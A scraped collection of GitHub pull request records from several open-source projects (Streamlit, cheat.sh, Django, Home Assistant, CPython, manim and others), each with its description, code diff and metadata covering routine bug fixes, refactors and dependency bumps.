By reviewing another pull request, you will help raise the code quality of
that pull request and the final review will be faster. This way the general
pace of pull request reviews will go up and your wait time will go down.
When picking a pull request to review, try to choose one that hasn't yet
been reviewed.
Thanks for helping out!
-->
To help with the load of incoming pull requests:
- [ ] I have reviewed two other [open pull requests][prs] in this repository.
[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
<!--
Thank you for contributing <3
Below, some useful links you could explore:
-->
[dev-checklist]: https://developers.home-assistant.io/docs/development_checklist/
[manifest-docs]: https://developers.home-assistant.io/docs/creating_integration_manifest/
[quality-scale]: https://developers.home-assistant.io/docs/integration_quality_scale_index/
[docs-repository]: https://github.com/home-assistant/home-assistant.io
[perfect-pr]: https://developers.home-assistant.io/docs/review-process/#creating-the-perfect-pr
|
https://api.github.com/repos/home-assistant/core/pulls/107622
|
2024-01-09T04:08:09Z
|
2024-01-14T02:04:04Z
|
2024-01-14T02:04:04Z
|
2024-01-15T02:14:05Z
| 434
|
home-assistant/core
| 39,581
|
Change youtube url regex to match youtube urls more formats
|
diff --git a/lib/streamlit/elements/media.py b/lib/streamlit/elements/media.py
index e24082bf4392..d20618ba9ffd 100644
--- a/lib/streamlit/elements/media.py
+++ b/lib/streamlit/elements/media.py
@@ -192,16 +192,10 @@ def dg(self) -> DeltaGenerator:
return cast("DeltaGenerator", self)
-# Regular expression explained at https://regexr.com/4n2l2 Covers any youtube
-# URL (incl. shortlinks and embed links) and extracts its code.
-YOUTUBE_RE: Final = re.compile(
- # Protocol
- r"http(?:s?):\/\/"
- # Domain
- r"(?:www\.)?youtu(?:be\.com|\.be)\/"
- # Path and query string
- r"(?P<watch>(watch\?v=)|embed\/)?(?P<code>[\w\-\_]*)(&(amp;)?[\w\?=]*)?"
-)
+# Regular expression from
+# https://gist.github.com/rodrigoborgesdeoliveira/987683cfbfcc8d800192da1e73adc486?permalink_comment_id=4645864#gistcomment-4645864
+# Covers any youtube URL (incl. shortlinks and embed links) and extracts its video code.
+YOUTUBE_RE: Final = r"^((https?://(?:www\.)?(?:m\.)?youtube\.com))/((?:oembed\?url=https?%3A//(?:www\.)youtube.com/watch\?(?:v%3D)(?P<video_id_1>[\w\-]{10,20})&format=json)|(?:attribution_link\?a=.*watch(?:%3Fv%3D|%3Fv%3D)(?P<video_id_2>[\w\-]{10,20}))(?:%26feature.*))|(https?:)?(\/\/)?((www\.|m\.)?youtube(-nocookie)?\.com\/((watch)?\?(app=desktop&)?(feature=\w*&)?v=|embed\/|v\/|e\/)|youtu\.be\/)(?P<video_id_3>[\w\-]{10,20})"
def _reshape_youtube_url(url: str) -> str | None:
@@ -221,9 +215,14 @@ def _reshape_youtube_url(url: str) -> str | None:
.. output::
https://www.youtube.com/embed/_T8LGqJtuGc
"""
- match = YOUTUBE_RE.match(url)
+ match = re.match(YOUTUBE_RE, url)
if match:
- return "https://www.youtube.com/embed/{code}".format(**match.groupdict())
+ code = (
+ match.group("video_id_1")
+ or match.group("video_id_2")
+ or match.group("video_id_3")
+ )
+ return f"https://www.youtube.com/embed/{code}"
return None
diff --git a/lib/tests/streamlit/elements/video_test.py b/lib/tests/streamlit/elements/video_test.py
index e80359b52ed9..a7ca65f780ec 100644
--- a/lib/tests/streamlit/elements/video_test.py
+++ b/lib/tests/streamlit/elements/video_test.py
@@ -59,11 +59,20 @@ def test_youtube_urls_transformed_to_embed_links(self):
"https://youtu.be/_T8LGqJtuGc",
"https://www.youtube.com/watch?v=kmfC-i9WgH0",
"https://www.youtube.com/embed/sSn4e1lLVpA",
+ "https://youtube.com/e/0TSXM-BGqHU",
+ "https://youtube.com/v/OIQskkX_DK0",
+ # HTTP should also work correctly
+ "http://youtu.be/4sPnOqeUDmk",
+ "http://www.youtube.com/embed/92jUAXBmZyU",
)
yt_embeds = (
"https://www.youtube.com/embed/_T8LGqJtuGc",
"https://www.youtube.com/embed/kmfC-i9WgH0",
"https://www.youtube.com/embed/sSn4e1lLVpA",
+ "https://www.youtube.com/embed/0TSXM-BGqHU",
+ "https://www.youtube.com/embed/OIQskkX_DK0",
+ "https://www.youtube.com/embed/4sPnOqeUDmk",
+ "https://www.youtube.com/embed/92jUAXBmZyU",
)
# url should be transformed into an embed link (or left alone).
for x in range(0, len(yt_urls)):
|
<!--
⚠️ BEFORE CONTRIBUTING PLEASE READ OUR CONTRIBUTING GUIDELINES!
https://github.com/streamlit/streamlit/wiki/Contributing
-->
## Describe your changes
Previously our YouTube regex doesn't match valid YouTube links (e.g. "https://youtube.com/e/0TSXM-BGqHU" or "https://youtube.com/v/OIQskkX_DK0"), which is why we failed to display videos in Streamlit via `st.video`.
Current Regexp covers those cases too.
Also instead of compiling regex on import time we do that lazily on demand (for a first run performance this should affect positively, and for consequent reruns this should not affect negatively, because [Python caches regex patterns](https://docs.python.org/3/howto/regex.html#module-level-functions).
## GitHub Issue Link (if applicable)
## Testing Plan
- Explanation of why no additional tests are needed
- Unit Tests (JS and/or Python) Added
- E2E Tests
- Any manual testing needed?
---
**Contribution License Agreement**
By submitting this pull request you agree that all contributions to this project are made under the Apache 2.0 license.
|
https://api.github.com/repos/streamlit/streamlit/pulls/8221
|
2024-02-29T15:52:49Z
|
2024-03-01T18:51:38Z
|
2024-03-01T18:51:38Z
|
2024-03-01T18:51:42Z
| 1,051
|
streamlit/streamlit
| 21,583
|
Add installation hint for cht.sh (fixes #114)
|
diff --git a/share/firstpage-v2.pnl b/share/firstpage-v2.pnl
index 0d160621..dd2cdc83 100644
--- a/share/firstpage-v2.pnl
+++ b/share/firstpage-v2.pnl
@@ -16,9 +16,9 @@
| $ cht.sh go/f<tab><tab>| | $ cht.sh --shell | | $ cht.sh go zip lists |
| go/for go/func | | cht.sh> help | | Ask any question using |
| $ cht.sh go/for | | ... | | cht.sh or curl cht.sh: |
-| ... | | | | /go/zip+lists |
-| | | | | (use /,+ when curling) |
-| | | | | |
+| ... | | $ curl cht.sh/:cht.sh | | /go/zip+lists |
+| | | #!/bin/sh | | (use /,+ when curling) |
+| | | ... | | |
+---- TAB-completion ----+ +-- interactive shell ---+ +- programming questions-+
+------------------------+ +------------------------+ +------------------------+
| $ curl cht.sh/:help | | $ vim prg.py | | $ time curl cht.sh/ |
@@ -49,7 +49,7 @@ DDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDD
D $ CCCCCCCCCCCBBBBBBBBBBD D $ CCCCCC BBBBBBB D D $ CCCCCC BBBBBBBBBBBB D
D go/for go/func D D HHHHHHH help D D ask any question using D
D $ cht.sh go/for D D ... D D cht.sh or curl cht.sh: D
-D ... D D D D /goHzipHlists D
+D ... D D $ BBBB CCCCCCCCCCCCCCC D D /goHzipHlists D
D D D D D (use H,H when curling) D
D D D D D D
DDDDDEEEEEEEEEEEEEEEEDDDDD DDDEEEEEEEEEEEEEEEEEEEDDDD DDEEEEEEEEEEEEEEEEEEEEEEDD
|
Fixes #114, not #141.
|
https://api.github.com/repos/chubin/cheat.sh/pulls/130
|
2019-03-10T10:09:12Z
|
2019-03-10T16:58:37Z
|
2019-03-10T16:58:37Z
|
2019-03-11T05:15:51Z
| 532
|
chubin/cheat.sh
| 15,179
|
Bump numpy from 1.23.4 to 1.23.5
|
diff --git a/Hand-Motion-Detection/requirements.txt b/Hand-Motion-Detection/requirements.txt
index 140a0c3ad3..f904226dea 100644
--- a/Hand-Motion-Detection/requirements.txt
+++ b/Hand-Motion-Detection/requirements.txt
@@ -1,3 +1,3 @@
-numpy==1.23.4
+numpy==1.23.5
opencv_python==4.6.0.66
mediapipe==0.8.11
|
Bumps [numpy](https://github.com/numpy/numpy) from 1.23.4 to 1.23.5.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/numpy/numpy/releases">numpy's releases</a>.</em></p>
<blockquote>
<h2>v1.23.5</h2>
<h1>NumPy 1.23.5 Release Notes</h1>
<p>NumPy 1.23.5 is a maintenance release that fixes bugs discovered after
the 1.23.4 release and keeps the build infrastructure current. The
Python versions supported for this release are 3.8-3.11.</p>
<h2>Contributors</h2>
<p>A total of 7 people contributed to this release. People with a "+" by
their names contributed a patch for the first time.</p>
<ul>
<li><a href="https://github.com/DWesl"><code>@DWesl</code></a></li>
<li>Aayush Agrawal +</li>
<li>Adam Knapp +</li>
<li>Charles Harris</li>
<li>Navpreet Singh +</li>
<li>Sebastian Berg</li>
<li>Tania Allard</li>
</ul>
<h2>Pull requests merged</h2>
<p>A total of 10 pull requests were merged for this release.</p>
<ul>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22489">#22489</a>: TST, MAINT: Replace most setup with setup_method (also teardown)</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22490">#22490</a>: MAINT, CI: Switch to cygwin/cygwin-install-action@v2</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22494">#22494</a>: TST: Make test_partial_iteration_cleanup robust but require leak...</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22592">#22592</a>: MAINT: Ensure graceful handling of large header sizes</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22593">#22593</a>: TYP: Spelling alignment for array flag literal</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22594">#22594</a>: BUG: Fix bounds checking for <code>random.logseries</code></li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22595">#22595</a>: DEV: Update GH actions and Dockerfile for Gitpod</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22596">#22596</a>: CI: Only fetch in actions/checkout</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22597">#22597</a>: BUG: Decrement ref count in gentype_reduce if allocated memory...</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22625">#22625</a>: BUG: Histogramdd breaks on big arrays in Windows</li>
</ul>
<h2>Checksums</h2>
<h3>MD5</h3>
<pre><code>8a412b79d975199cefadb465279fd569 numpy-1.23.5-cp310-cp310-macosx_10_9_x86_64.whl
1b56e8e6a0516c78473657abf0710538 numpy-1.23.5-cp310-cp310-macosx_11_0_arm64.whl
c787f4763c9a5876e86a17f1651ba458 numpy-1.23.5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl
db07645022e56747ba3f00c2d742232e numpy-1.23.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
c63a6fb7cc16a13aabc82ec57ac6bb4d numpy-1.23.5-cp310-cp310-win32.whl
3fea9247e1d812600015641941fa273f numpy-1.23.5-cp310-cp310-win_amd64.whl
4222cfb36e5ac9aec348c81b075e2c05 numpy-1.23.5-cp311-cp311-macosx_10_9_x86_64.whl
6c7102f185b310ac70a62c13d46f04e6 numpy-1.23.5-cp311-cp311-macosx_11_0_arm64.whl
6b7319f66bf7ac01b49e2a32470baf28 numpy-1.23.5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl
3c60928ddb1f55163801f06ac2229eb0 numpy-1.23.5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
6936b6bcfd6474acc7a8c162a9393b3c numpy-1.23.5-cp311-cp311-win32.whl
</code></pre>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/numpy/numpy/commit/de82cd9468704a033702974010ee7e7efc85b393"><code>de82cd9</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22626">#22626</a> from charris/prepare-1.23.5-release</li>
<li><a href="https://github.com/numpy/numpy/commit/9c7ac340aa4298dbad574fc8bdfc16dfa175d820"><code>9c7ac34</code></a> REL: Prepare for the NumPy 1.23.5 Release.</li>
<li><a href="https://github.com/numpy/numpy/commit/2c4cf9a3c4cff914e3f9d190f42546d3e7c9ff82"><code>2c4cf9a</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22625">#22625</a> from charris/backport-22561</li>
<li><a href="https://github.com/numpy/numpy/commit/dcd9404456e4af37041ee740045e95b10aaa46ad"><code>dcd9404</code></a> BUG: Histogramdd breaks on big arrays in Windows (<a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22561">#22561</a>)</li>
<li><a href="https://github.com/numpy/numpy/commit/bb5e3a671f1fab8bf39346c760cf65009f91bea2"><code>bb5e3a6</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22597">#22597</a> from charris/backport-22557</li>
<li><a href="https://github.com/numpy/numpy/commit/0d3d50045fdb4012e51d47ab95e9fbbbbd08ca00"><code>0d3d500</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22596">#22596</a> from charris/backport-22503</li>
<li><a href="https://github.com/numpy/numpy/commit/38fe21f6cae59326a4b35c5337c78052df153d41"><code>38fe21f</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22595">#22595</a> from charris/backport-22452</li>
<li><a href="https://github.com/numpy/numpy/commit/45329c1ee92d00959d11cdfa0a2c5a25a6867933"><code>45329c1</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22593">#22593</a> from charris/backport-22447</li>
<li><a href="https://github.com/numpy/numpy/commit/3ca02ce5b1a4ec2412cad839d42452a4200a5270"><code>3ca02ce</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22594">#22594</a> from charris/backport-22450</li>
<li><a href="https://github.com/numpy/numpy/commit/8cededdf4eeebd4f1985bd74c11fbf44f367937f"><code>8cededd</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22592">#22592</a> from charris/backport-22393</li>
<li>Additional commits viewable in <a href="https://github.com/numpy/numpy/compare/v1.23.4...v1.23.5">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details>
|
https://api.github.com/repos/geekcomputers/Python/pulls/1796
|
2022-11-21T19:27:03Z
|
2022-12-04T19:47:56Z
|
2022-12-04T19:47:56Z
|
2022-12-04T19:48:13Z
| 117
|
geekcomputers/Python
| 31,535
|
Fixed broken tests on Python 3 after 3c5fc708f1a8f60c05182869f6f3ec13697...
|
diff --git a/tests/modeladmin/tests.py b/tests/modeladmin/tests.py
index f6a250db09834..146c078e592b4 100644
--- a/tests/modeladmin/tests.py
+++ b/tests/modeladmin/tests.py
@@ -552,6 +552,20 @@ def assertIsInvalid(self, model_admin, model, msg,
]
self.assertEqual(errors, expected)
+ def assertIsInvalidRegexp(self, model_admin, model, msg,
+ id=None, hint=None, invalid_obj=None):
+ """
+ Same as assertIsInvalid but treats the given msg as a regexp.
+ """
+ invalid_obj = invalid_obj or model_admin
+ errors = model_admin.check(model=model)
+ self.assertEqual(len(errors), 1)
+ error = errors[0]
+ self.assertEqual(error.hint, hint)
+ self.assertEqual(error.obj, invalid_obj)
+ self.assertEqual(error.id, id)
+ self.assertRegexpMatches(error.msg, msg)
+
def assertIsValid(self, model_admin, model):
errors = model_admin.check(model=model)
expected = []
@@ -1302,9 +1316,9 @@ class ValidationTestInline(object):
class ValidationTestModelAdmin(ModelAdmin):
inlines = [ValidationTestInline]
- self.assertIsInvalid(
+ self.assertIsInvalidRegexp(
ValidationTestModelAdmin, ValidationTestModel,
- "'modeladmin.tests.ValidationTestInline' must inherit from 'BaseModelAdmin'.",
+ r"'.*\.ValidationTestInline' must inherit from 'BaseModelAdmin'\.",
'admin.E104')
def test_missing_model_field(self):
@@ -1314,9 +1328,9 @@ class ValidationTestInline(TabularInline):
class ValidationTestModelAdmin(ModelAdmin):
inlines = [ValidationTestInline]
- self.assertIsInvalid(
+ self.assertIsInvalidRegexp(
ValidationTestModelAdmin, ValidationTestModel,
- "'modeladmin.tests.ValidationTestInline' must have a 'model' attribute.",
+ r"'.*\.ValidationTestInline' must have a 'model' attribute\.",
'admin.E105')
def test_invalid_model_type(self):
@@ -1332,9 +1346,9 @@ class ValidationTestInline(TabularInline):
class ValidationTestModelAdmin(ModelAdmin):
inlines = [ValidationTestInline]
- self.assertIsInvalid(
+ self.assertIsInvalidRegexp(
ValidationTestModelAdmin, ValidationTestModel,
- "The value of 'modeladmin.tests.ValidationTestInline.model' must be a Model.",
+ r"The value of '.*\.ValidationTestInline.model' must be a Model\.",
'admin.E106')
def test_valid_case(self):
|
...bbcf2.
|
https://api.github.com/repos/django/django/pulls/2389
|
2014-03-03T14:39:04Z
|
2014-03-03T14:50:55Z
|
2014-03-03T14:50:55Z
|
2014-07-19T16:00:06Z
| 592
|
django/django
| 51,560
|
Revert "CANPacker: assert no undefined signals (#28942)"
|
diff --git a/opendbc b/opendbc
index b03468a714da2e..3ef35ed2298a3a 160000
--- a/opendbc
+++ b/opendbc
@@ -1 +1 @@
-Subproject commit b03468a714da2eb8ef83f07a373f3f1514491cad
+Subproject commit 3ef35ed2298a3a9d199f9145409547710065884c
|
This reverts commit 13371b07a2fbfe5ea07b245f8b2a0ba938900ccc.
|
https://api.github.com/repos/commaai/openpilot/pulls/29013
|
2023-07-18T05:19:16Z
|
2023-07-18T05:41:39Z
|
2023-07-18T05:41:39Z
|
2023-07-18T05:41:40Z
| 108
|
commaai/openpilot
| 9,322
|
pylint fixes
|
diff --git a/letsencrypt/client/challenge_util.py b/letsencrypt/client/challenge_util.py
index 69f351f7d8a..46b0602bee1 100644
--- a/letsencrypt/client/challenge_util.py
+++ b/letsencrypt/client/challenge_util.py
@@ -36,7 +36,7 @@ def dvsni_gen_cert(filepath, name, r_b64, nonce, key):
key.pem, [nonce + CONFIG.INVALID_EXT, name, ext])
with open(filepath, 'w') as chall_cert_file:
- chall_cert_file.write(cert_pem)
+ chall_cert_file.write(cert_pem)
return le_util.jose_b64encode(dvsni_s)
diff --git a/letsencrypt/client/recovery_token_challenge.py b/letsencrypt/client/recovery_token_challenge.py
index 04a3d3ec91a..56d401dad1c 100644
--- a/letsencrypt/client/recovery_token_challenge.py
+++ b/letsencrypt/client/recovery_token_challenge.py
@@ -3,9 +3,8 @@
.. note:: This challenge has not been implemented into the project yet
"""
-import display
-
from letsencrypt.client import challenge
+from letsencrypt.client import display
class RecoveryToken(challenge.Challenge):
diff --git a/letsencrypt/scripts/main.py b/letsencrypt/scripts/main.py
index 9030d8f6953..19c34cc64a1 100755
--- a/letsencrypt/scripts/main.py
+++ b/letsencrypt/scripts/main.py
@@ -201,7 +201,7 @@ def read_file(filename):
"""
try:
- return filename, file(filename, 'rU').read()
+ return filename, open(filename, 'rU').read()
except IOError as exc:
raise argparse.ArgumentTypeError(exc.strerror)
|
https://api.github.com/repos/certbot/certbot/pulls/132
|
2014-12-17T08:15:16Z
|
2014-12-22T00:51:10Z
|
2014-12-22T00:51:10Z
|
2016-05-06T19:21:26Z
| 403
|
certbot/certbot
| 690
|
|
Adjust error handling scope in samsungtv
|
diff --git a/homeassistant/components/samsungtv/bridge.py b/homeassistant/components/samsungtv/bridge.py
index 3a06a9ff906146..342c4f7f42937c 100644
--- a/homeassistant/components/samsungtv/bridge.py
+++ b/homeassistant/components/samsungtv/bridge.py
@@ -430,18 +430,16 @@ async def _async_get_remote_under_lock(self) -> SamsungTVWSAsyncRemote | None:
"""Create or return a remote control instance."""
if self._remote is None or not self._remote.is_alive():
# We need to create a new instance to reconnect.
+ LOGGER.debug("Create SamsungTVWSBridge for %s (%s)", CONF_NAME, self.host)
+ assert self.port
+ self._remote = SamsungTVWSAsyncRemote(
+ host=self.host,
+ port=self.port,
+ token=self.token,
+ timeout=TIMEOUT_WEBSOCKET,
+ name=VALUE_CONF_NAME,
+ )
try:
- LOGGER.debug(
- "Create SamsungTVWSBridge for %s (%s)", CONF_NAME, self.host
- )
- assert self.port
- self._remote = SamsungTVWSAsyncRemote(
- host=self.host,
- port=self.port,
- token=self.token,
- timeout=TIMEOUT_WEBSOCKET,
- name=VALUE_CONF_NAME,
- )
await self._remote.start_listening()
# This is only happening when the auth was switched to DENY
# A removed auth will lead to socket timeout because waiting for auth popup is just an open socket
|
## Proposed change
<!--
Describe the big picture of your changes here to communicate to the
maintainers why we should accept this pull request. If it fixes a bug
or resolves a feature request, be sure to link to that issue in the
additional information section.
-->
Contrary to the legacy library, the `SamsungTVWS` doesn't attempt to connect in the constructor or in the context manager.
This moves the exception handling only include the `remote.open()` method which can cause the exception.
See https://github.com/xchwarze/samsung-tv-ws-api/blob/d539372cb7dc93e7b94bb3fdf5cc57f585b69e45/samsungtvws/remote.py#L36-L56 for confirmation.
The tests were previously adjusted in #66651,
## Type of change
<!--
What type of change does your PR introduce to Home Assistant?
NOTE: Please, check only 1! box!
If your PR requires multiple boxes to be checked, you'll most likely need to
split it into multiple PRs. This makes things easier and faster to code review.
-->
- [ ] Dependency upgrade
- [ ] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [x] Code quality improvements to existing code or addition of tests
## Additional information
<!--
Details are important, and help maintainers processing your PR.
Please be sure to fill out additional details, if applicable.
-->
- This PR fixes or closes issue: fixes #
- This PR is related to issue:
- Link to documentation pull request:
## Checklist
<!--
Put an `x` in the boxes that apply. You can also fill these out after
creating the PR. If you're unsure about any of them, don't hesitate to ask.
We're here to help! This is simply a reminder of what we are going to look
for before merging your code.
-->
- [ ] The code change is tested and works locally.
- [ ] Local tests pass. **Your PR cannot be merged unless tests pass**
- [ ] There is no commented out code in this PR.
- [ ] I have followed the [development checklist][dev-checklist]
- [ ] The code has been formatted using Black (`black --fast homeassistant tests`)
- [ ] Tests have been added to verify that the new code works.
If user exposed functionality or configuration variables are added/changed:
- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]
If the code communicates with devices, web services, or third-party tools:
- [ ] The [manifest file][manifest-docs] has all fields filled out correctly.
Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`.
Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.
The integration reached or maintains the following [Integration Quality Scale][quality-scale]:
<!--
The Integration Quality Scale scores an integration on the code quality
and user experience. Each level of the quality scale consists of a list
of requirements. We highly recommend getting your integration scored!
-->
- [ ] No score or internal
- [ ] 🥈 Silver
- [ ] 🥇 Gold
- [ ] 🏆 Platinum
<!--
This project is very active and we have a high turnover of pull requests.
Unfortunately, the number of incoming pull requests is higher than what our
reviewers can review and merge so there is a long backlog of pull requests
waiting for review. You can help here!
By reviewing another pull request, you will help raise the code quality of
that pull request and the final review will be faster. This way the general
pace of pull request reviews will go up and your wait time will go down.
When picking a pull request to review, try to choose one that hasn't yet
been reviewed.
Thanks for helping out!
-->
To help with the load of incoming pull requests:
- [ ] I have reviewed two other [open pull requests][prs] in this repository.
[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
<!--
Thank you for contributing <3
Below, some useful links you could explore:
-->
[dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html
[manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html
[quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html
[docs-repository]: https://github.com/home-assistant/home-assistant.io
|
https://api.github.com/repos/home-assistant/core/pulls/66692
|
2022-02-16T21:06:35Z
|
2022-03-02T19:52:12Z
|
2022-03-02T19:52:12Z
|
2022-03-03T20:01:55Z
| 351
|
home-assistant/core
| 38,884
|
gh-86618: Improve colorsys.rgb_to_hls code
|
diff --git a/Lib/colorsys.py b/Lib/colorsys.py
index b93e3844067e4e..0f52512a67d87c 100644
--- a/Lib/colorsys.py
+++ b/Lib/colorsys.py
@@ -75,17 +75,18 @@ def yiq_to_rgb(y, i, q):
def rgb_to_hls(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
- # XXX Can optimize (maxc+minc) and (maxc-minc)
- l = (minc+maxc)/2.0
+ sumc = (maxc+minc)
+ rangec = (maxc-minc)
+ l = sumc/2.0
if minc == maxc:
return 0.0, l, 0.0
if l <= 0.5:
- s = (maxc-minc) / (maxc+minc)
+ s = rangec / sumc
else:
- s = (maxc-minc) / (2.0-maxc-minc)
- rc = (maxc-r) / (maxc-minc)
- gc = (maxc-g) / (maxc-minc)
- bc = (maxc-b) / (maxc-minc)
+ s = rangec / (2.0-sumc)
+ rc = (maxc-r) / rangec
+ gc = (maxc-g) / rangec
+ bc = (maxc-b) / rangec
if r == maxc:
h = bc-gc
elif g == maxc:
|
Cache repeated sum and difference to make code slightly faster and easier to read.
<!-- gh-issue-number: gh-86618 -->
* Issue: gh-86618
<!-- /gh-issue-number -->
|
https://api.github.com/repos/python/cpython/pulls/23306
|
2020-11-15T22:58:18Z
|
2020-11-28T07:11:20Z
|
2020-11-28T07:11:20Z
|
2023-07-11T11:12:48Z
| 384
|
python/cpython
| 4,157
|
Potential fix for issues/571
|
diff --git a/modules/text_generation.py b/modules/text_generation.py
index fd017e2c1d..eb8f6ca17c 100644
--- a/modules/text_generation.py
+++ b/modules/text_generation.py
@@ -236,8 +236,6 @@ def generate_with_streaming(**kwargs):
break
yield formatted_outputs(reply, shared.model_name)
- yield formatted_outputs(reply, shared.model_name)
-
# Stream the output naively for FlexGen since it doesn't support 'stopping_criteria'
else:
for i in range(max_new_tokens//8+1):
|
It appears that the line removed was introduced as part of a merge conflict/fix in https://github.com/oobabooga/text-generation-webui/commit/b3e10e47c05128bf477833d8261ea5bedecc9aac . Removing the line appears to remove the stack trace from logs, and I believe results in one fewer emission of the final reply generated in the preceding loop.
|
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/572
|
2023-03-25T20:11:56Z
|
2023-03-27T17:06:38Z
|
2023-03-27T17:06:38Z
|
2023-03-27T21:01:00Z
| 129
|
oobabooga/text-generation-webui
| 26,696
|
Fix GraphScene and NumberLine
|
diff --git a/manimlib/mobject/number_line.py b/manimlib/mobject/number_line.py
index 1e50692e7f..8736ee6cbd 100644
--- a/manimlib/mobject/number_line.py
+++ b/manimlib/mobject/number_line.py
@@ -99,7 +99,7 @@ def get_tick(self, x, size=None):
return result
def get_tick_marks(self):
- return self.tick_marks
+ return self.ticks
def number_to_point(self, number):
alpha = float(number - self.x_min) / (self.x_max - self.x_min)
diff --git a/manimlib/scene/graph_scene.py b/manimlib/scene/graph_scene.py
index 6bfc6d34d5..cc3faf78f7 100644
--- a/manimlib/scene/graph_scene.py
+++ b/manimlib/scene/graph_scene.py
@@ -82,7 +82,7 @@ def setup_axes(self, animate=False):
if len(self.x_labeled_nums) > 0:
if self.exclude_zero_label:
self.x_labeled_nums = [x for x in self.x_labeled_nums if x != 0]
- x_axis.add_numbers(*self.x_labeled_nums)
+ x_axis.add_numbers(self.x_labeled_nums)
if self.x_axis_label:
x_label = TexText(self.x_axis_label)
x_label.next_to(
@@ -116,7 +116,7 @@ def setup_axes(self, animate=False):
if len(self.y_labeled_nums) > 0:
if self.exclude_zero_label:
self.y_labeled_nums = [y for y in self.y_labeled_nums if y != 0]
- y_axis.add_numbers(*self.y_labeled_nums)
+ y_axis.add_numbers(self.y_labeled_nums)
if self.y_axis_label:
y_label = TexText(self.y_axis_label)
y_label.next_to(
|
<!-- Thanks for contributing to manim!
Please ensure that your pull request works with the latest version of manim.
-->
## Motivation
<!-- Outline your motivation: In what way do your changes improve the library? -->
Fixed #1354.
Temporarily fix the problem that occurs when `GraphScene` calls `NumberLine`.
But I am not sure if it is necessary to continue to support `GraphScene`. If needed, then more adaptive changes should be made to `GraphScene`; if not, then it should be deleted.
## Proposed changes
<!-- What you changed in those files -->
- Change `self.tick_marks` to `self.ticks`
- Do not unpack when passing the value to `add_numbers()`
## Test
<!-- How do you test your changes -->
**Code**: The code in #1354
```python
class Plot2yLabelNumbers(GraphScene):
CONFIG = {
"y_min": 0,
"y_max": 100,
"y_axis_config": {"tick_frequency": 10},
"y_labeled_nums": np.arange(0, 100, 10)
}
def construct(self):
self.setup_axes()
dot = Dot().move_to(self.coords_to_point(PI / 2, 20))
func_graph = self.get_graph(lambda x: 20 * np.sin(x))
self.add(dot,func_graph)
```
**Result**:

|
https://api.github.com/repos/3b1b/manim/pulls/1355
|
2021-02-05T06:06:29Z
|
2021-02-05T22:51:47Z
|
